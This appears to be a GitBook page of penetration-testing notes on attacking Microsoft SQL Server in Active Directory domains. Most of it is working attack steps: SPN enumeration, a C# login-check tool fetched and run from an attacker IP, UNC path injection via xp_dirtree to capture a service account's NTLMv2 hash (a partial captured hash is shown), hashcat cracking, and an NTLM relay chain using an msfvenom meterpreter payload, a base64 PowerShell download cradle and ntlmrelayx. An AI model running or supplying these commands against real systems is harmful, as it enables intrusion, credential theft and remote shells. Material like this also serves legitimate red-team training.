All Gitbook

MS SQL

typically integrated with AD - Get NTLMv2 hashes of the service accounts first

LogoPowerUpSQL Cheat Sheet · NetSPI/PowerUpSQL WikiGitHub
LogoGitHub - NetSPI/DAFT: DAFT: Database Audit Framework & ToolkitGitHub
LogoGitHub - NetSPI/ESC: Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.GitHub
LogoMSSQLCheatSheets
LogoPowerUpSQL | Infrastructure penetration testing notes

Enumerate for MS SQL Server Existence & Accounts

Logokerberoast/GetUserSPNs.ps1 at master · nidem/kerberoastGitHub
. .\getuserspns.ps1 | ft

We also obtain information about the service account context under which the SQL servers are running.

SQLSvc domain account could be a member of the built-in Administrators group. This means that the service account is a local administrator on the servers where it's used.

Nmap check 1433

From compromised domain-joined host & user: 

setspn -T domain_name_eg_corp1 -Q MSSQLSvc/*
LogoPowerUpSQL/PowerUpSQL.ps1 at master · NetSPI/PowerUpSQLGitHub
with PowerUpSQL
Get-SQLInstanceDomain | Get-SQLConnectionTest
Get-SQLServerInfo -Verbose -Instance

MS SQL Server Enumeration

Windows authentication is typically enabled when the SQL server is integrated with AD so we can authenticate through Kerberos without a password needed.

LogoOSEP-Code-Snippets/Program.cs at main · chvancooten/OSEP-Code-SnippetsGitHub

After a successful login. The login is mapped to a database user account. If we perform a login with an account that has no associated SQL user account, it will automatically be mapped to the built-in guest user account. A login such as sa, which is mapped to the dbo user, will have the sysadmin role.

boilerplate
using System;
using System.Data.SqlClient;

namespace MSSQL
{
	public class Program
	{
		public static String executeQuery(String query, SqlConnection con)
		{
			SqlCommand cmd = new SqlCommand(query, con);
			SqlDataReader reader = cmd.ExecuteReader();
			try
			{
				String result = "";
				while (reader.Read() == true)
				{
					result += reader[0] + "\n";
				}
				reader.Close();
				return result;
			}
			catch
			{
				return "";
			}
		}

		public static void getGroupMembership(String groupToCheck, SqlConnection con)
		{
			String res = executeQuery($"SELECT IS_SRVROLEMEMBER('{groupToCheck}');", con);
			int role = int.Parse(res);
			if (role == 1)
			{
				Console.WriteLine($"[+] User is a member of the '{groupToCheck}' group.");
			}
			else
			{
				Console.WriteLine($"[-] User is not a member of the '{groupToCheck}' group.");
			}
		}

		public static void Main(string[] args)
		{
			//replace into the server logging in
			String serv = "dc01.corp1.com";
			String db = "master";
			String conStr = $"Server = {serv}; Database = {db}; Integrated Security = True;";
			SqlConnection con = new SqlConnection(conStr);

			try
			{
				con.Open();
				Console.WriteLine("[+] Authenticated to MSSQL Server!");
			}
			catch
			{
				Console.WriteLine("[-] Authentication failed.");
				Environment.Exit(0);
			}

			// Enumerate login info
			String login = executeQuery("SELECT SYSTEM_USER;", con);
			Console.WriteLine($"[*] Logged in as: {login}");
			String uname = executeQuery("SELECT USER_NAME();", con);
			Console.WriteLine($"[*] Database username: {uname}");
			getGroupMembership("public", con);
			getGroupMembership("sysadmin", con);
		}
	}
}
Execution
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/sql.exe', 'sql.exe') | .\sql.exe

UNC Path Injection to Get NTLMv2 Hash

Target local server
Invoke-SQLUncPathInjection -Verbose -CaptureIp 192.168.119.120
To target linked server
Get-SQLServerLinkCrawl -instance "SQLSERVER1\Instance1" -Query "exec xp_dirtree '\\attackerip\file'" -Export | ft

NTLM authentication will take place if we force an SQL server to connect to an SMB share and we should be able to capture the hash of the user account under whose context the SQL server is running.

LogoSQL Server UNC Path Injection Cheat Sheet · NetSPI/PowerUpSQL WikiGitHub
Many other SQL procedures can be used to initiate the connection if xp_dirtree has been removed for security reasons
insert into Main
			// Force NTLM authentication for hash-grabbing or relaying
			;
			String res = executeQuery($"EXEC master..xp_dirtree \"{targetShare}\";", con);
			Console.WriteLine($"[*] Forced authentication to '{targetShare}'.");

Setup kali SMB share to capture the hash before executing the application

SMB listener
sudo responder 
*execute the payload
EXEC master..xp_dirtree "\\192.168.45.181\share";
hash.txt
SQLSvc::corp1:00031db3ed40602b:A05501E7450025CF27120CE89BAF1C6E:0101000000000000C0653150DE09D201F361.....000000
hash crack -d 2
hashcat -m 5600 hash.txt rockyou.txt

Net-NTLM Relaying (if can't crack) - the svc account needs to have access to other servers

Works on if SMB signing is not enabled (only enabled by default on DCs). Net-NTLM hash cannot be used in a pass-the-hash attack. It's not possible to relay a Net-NTLM hash back to the origin computer, only to another computer.

Getting a shell on another server in the context of the SQL server service account without cracking the password by forcing NTML authentication on a SQL server to us for relaying.

0) payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f raw -o shell.txt
1. encode dl cradle
printf %s '(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/shell.txt') | IEX' | iconv -t UTF-16LE | base64 -w 0
2) serve shell.txt
python -m http.server
3) shell listener
sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run
4) relayer listener + exec
sudo impacket-ntlmrelayx --no-http-server -smb2support  -c 'powershell -enc {output from 1)}'

*can replace the enc to execute the UNC payloa

no -c = dump hash
PreviousAppLocker Bypass with JScriptNextEscalation

Last updated